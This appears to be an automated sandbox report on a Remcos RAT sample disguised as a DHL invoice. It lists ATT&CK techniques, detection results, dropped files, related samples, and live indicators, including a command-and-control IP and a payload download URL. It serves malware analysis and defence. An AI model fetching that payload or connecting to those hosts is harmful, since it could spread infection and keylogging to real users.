              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		2
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		1
              Obfuscated Files or Information              		LSASS Memory15
              System Information Discovery              		Remote Desktop Protocol11
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Command and Scripting Interpreter              		Logon Script (Windows)212
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager11
              Security Software Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Masquerading              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Virtualization/Sandbox Evasion              		LSA Secrets21
              Virtualization/Sandbox Evasion              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Access Token Manipulation              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
              Process Injection              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416845 Sample: DHL TAX INVOICES - MARCH 2024.exe Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 48 geoplugin.net 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for dropped file 2->54 56 10 other signatures 2->56 9 DHL TAX INVOICES - MARCH 2024.exe 1 28 2->9         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 9->36 dropped 38 C:\Users\user\...\Handelshindringens.Dec, ASCII 9->38 dropped 64 Suspicious powershell command line found 9->64 13 powershell.exe 20 9->13         started        signatures6 process7 file8 40 C:\...\DHL TAX INVOICES - MARCH 2024.exe, PE32 13->40 dropped 66 Obfuscated command line found 13->66 68 Writes to foreign memory regions 13->68 70 Powershell drops PE file 13->70 17 wab.exe 3 15 13->17         started        22 conhost.exe 13->22         started        24 cmd.exe 1 13->24         started        signatures9 process10 dnsIp11 42 162.251.122.89, 2404, 49737, 49738 UNREAL-SERVERSUS Canada 17->42 44 83.137.157.76, 49736, 80 INVITECHHU Hungary 17->44 46 geoplugin.net 178.237.33.50, 49739, 80 ATOM86-ASATOM86NL Netherlands 17->46 34 C:\ProgramData\remcos\logs.dat, data 17->34 dropped 58 Detected Remcos RAT 17->58 60 Sample uses process hollowing technique 17->60 62 Installs a global keyboard hook 17->62 26 wab.exe 17->26         started        28 wab.exe 17->28         started        30 wab.exe 17->30         started        32 33 other processes 17->32 file12 signatures13 process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DHL TAX INVOICES - MARCH 2024.exe8%ReversingLabs
              DHL TAX INVOICES - MARCH 2024.exe13%VirustotalBrowse
              DHL TAX INVOICES - MARCH 2024.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe8%ReversingLabs
              C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe13%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              geoplugin.net3%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              162.251.122.890%Avira URL Cloudsafe
              http://geoplugin.net/json.gp20%Avira URL Cloudsafe
              http://83.137.157.76/gDuOvMZLyhtbvV140.bin0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpe0%Avira URL Cloudsafe
              http://83.137.157.76/gDuOvMZLyhtbvV140.bini0%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              http://83.137.157.76/gDuOvMZLyhtbvV140.binQ0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp20%VirustotalBrowse
              http://geoplugin.net/json.gpe0%VirustotalBrowse
              http://geoplugin.net/3%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://83.137.157.76/gDuOvMZLyhtbvV140.binfalse
              • Avira URL Cloud: safe
              		unknown
              162.251.122.89true
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gptrue
              • URL Reputation: phishing
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.imvu.comrwab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gpewab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.imvu.comwab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp2wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorDHL TAX INVOICES - MARCH 2024.exe, DHL TAX INVOICES - MARCH 2024.exe.1.drfalse
                      		high
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.comwab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                          		high
                          http://83.137.157.76/gDuOvMZLyhtbvV140.biniwab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.nirsoft.net/wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://83.137.157.76/gDuOvMZLyhtbvV140.binQwab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.ebuddy.comwab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  83.137.157.76
                                  		unknownHungary
                                  		12301INVITECHHUfalse
                                  178.237.33.50
                                  		geoplugin.netNetherlands
                                  		8455ATOM86-ASATOM86NLfalse
                                  162.251.122.89
                                  		unknownCanada
                                  		64236UNREAL-SERVERSUStrue

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1416845
                                  Start date and time:2024-03-28 08:00:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:44
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:DHL TAX INVOICES - MARCH 2024.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@5988/15@1/3
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 93%
                                  • Number of executed functions: 86
                                  • Number of non-executed functions: 48
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 4908 because it is empty
                                  • Execution Graph export aborted for target wab.exe, PID 7824 because there are no executed function
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  08:00:51API Interceptor42x Sleep call for process: powershell.exe modified
                                  08:02:33API Interceptor87x Sleep call for process: wab.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  178.237.33.50Statement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  admzx.scr.exeGet hashmaliciousRemcosBrowse
                                  • geoplugin.net/json.gp
                                  DOC10123@#@.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  • geoplugin.net/json.gp
                                  Order inquiry.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • geoplugin.net/json.gp
                                  162.251.122.89AHL STEEL REQUIREMENTS - Ref No 240318-03.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    DRAFT PO # J-112308 - CMS.exeGet hashmaliciousRemcos, GuLoaderBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      geoplugin.netStatement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50
                                      3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50
                                      awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      admzx.scr.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      DOC10123@#@.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      Order inquiry.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ATOM86-ASATOM86NLStatement of Account for Past Due Invoices.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      z1awb_shipping_documents_27_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      ENQUNION096424 CLOSING DATE URGENT.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50
                                      3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      PI-BD2403001.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50
                                      awb_shipping_documents_26_03_2024_000000000.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      admzx.scr.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      DOC10123@#@.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      • 178.237.33.50
                                      Order inquiry.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 178.237.33.50
                                      INVITECHHUhuhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 91.83.150.76
                                      Swift15032022.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 83.137.157.61
                                      7InjeWQVHC.elfGet hashmaliciousUnknownBrowse
                                      • 89.148.108.246
                                      Import_Declaration_3155066471_1235623E21045M.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 83.137.157.60
                                      AHL STEEL REQUIREMENTS - Ref No 240318-03.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 83.137.157.60
                                      PO1876.xlsGet hashmaliciousAgentTeslaBrowse
                                      • 83.137.157.51
                                      VAN3065008.xlsGet hashmaliciousAgentTeslaBrowse
                                      • 83.137.157.51
                                      DRAFT PO # J-112308 - CMS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 83.137.157.60
                                      QvDJbC4uaNGet hashmaliciousXmrigBrowse
                                      • 213.197.122.124
                                      SzlNt8DaPj.elfGet hashmaliciousUnknownBrowse
                                      • 82.131.163.114
                                      UNREAL-SERVERSUS3rd Shipment schedule & packing list of NORDLEOPARD V.413S.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 212.162.149.217
                                      Order P.O26_3_24.CommonWealth.pdf.exeGet hashmaliciousRemcosBrowse
                                      • 212.162.149.217
                                      SSY3gpQdzq.exeGet hashmaliciousRemcosBrowse
                                      • 212.162.149.217
                                      Import_Declaration_3155066471_1235623E21045M.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 162.251.122.100
                                      AHL STEEL REQUIREMENTS - Ref No 240318-03.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 162.251.122.89
                                      DRAFT PO # J-112308 - CMS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 162.251.122.89
                                      Electro PO - Display Purchase Order.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                      • 185.202.175.127
                                      11050OR2301166[1].exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                      • 185.202.175.127
                                      BOQ 232611-05 (JOB IN HAND).exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 172.96.14.18
                                      PAYMENT _ADVICE_MT_105 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • 172.96.14.30

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dllREF_17218_VV-0002.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        PO_00290292.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                            teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                              SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                SMGS-RCDU5010031.exeGet hashmaliciousGuLoaderBrowse
                                                  RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoaderBrowse
                                                      IMG-2023010_WAA646737kendelsesordningenBalneo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        IMG-2023010_WAA646737kendelsesordningenBalneo.exeGet hashmaliciousGuLoaderBrowse

                                                          Created / dropped Files

                                                          C:\ProgramData\remcos\logs.dat

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):144
                                                          Entropy (8bit):3.318721553307006
                                                          Encrypted:false
                                                          SSDEEP:3:rhlKlrl9fVl1NVlVlClDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lWl55YcIeeDAlOWAv
                                                          MD5:010AFF889E6F61236043A30DE862D96B
                                                          SHA1:8DFE6A62C68CC197D90699993368BE9C0747A6B7
                                                          SHA-256:953B3D7020ADB40E5B815B993F37A00B68B656715B4E02252EEEF94339291A8C
                                                          SHA-512:23EE0773B648DC466DAA19C3448A98B91BD612E67921F46EDB4D2ABB61E65218219475A8B103F52561077226175DB585B3D0814479EA99A114788E0EC8066A63
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                          Preview:....[.2.0.2.4./.0.3./.2.8. .0.8.:.0.2.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):989
                                                          Entropy (8bit):5.019408940029604
                                                          Encrypted:false
                                                          SSDEEP:12:tkEU+nd6UGkMyGWKyGXPVGArwY3yGhsp+axH0sp+GYArpv/mOAaNO+ao9W7iN5zp:qydVauKyGX852sesPvXhNlT3/75ciWro
                                                          MD5:D3D1956DA737B1B3EF05DA28210D81B7
                                                          SHA1:40287B4136212BFD82AE0388DD3178721926FCDB
                                                          SHA-256:0BA354EA36476D11344D1E20DED0C3658FD39B6D436C916AE02FB1E7DC47D742
                                                          SHA-512:EA5BAF54FBB5BFD754308DCF2F9C77E9840BA8B194906060A77958F22CC76F5CDC317D68566EFEAD200D4934EF2DBECDBC3DCA089327AC7771136C9AE8AEB7D9
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"102.165.48.43",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):8003
                                                          Entropy (8bit):4.838950934453595
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1yfh1dtv.vsb.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4ro5zsl.v52.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6656
                                                          Entropy (8bit):5.140229856656103
                                                          Encrypted:false
                                                          SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                          MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                          SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                          SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                          SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                          • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                          • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                          • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                          • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                          • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                          • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                          • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                          • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
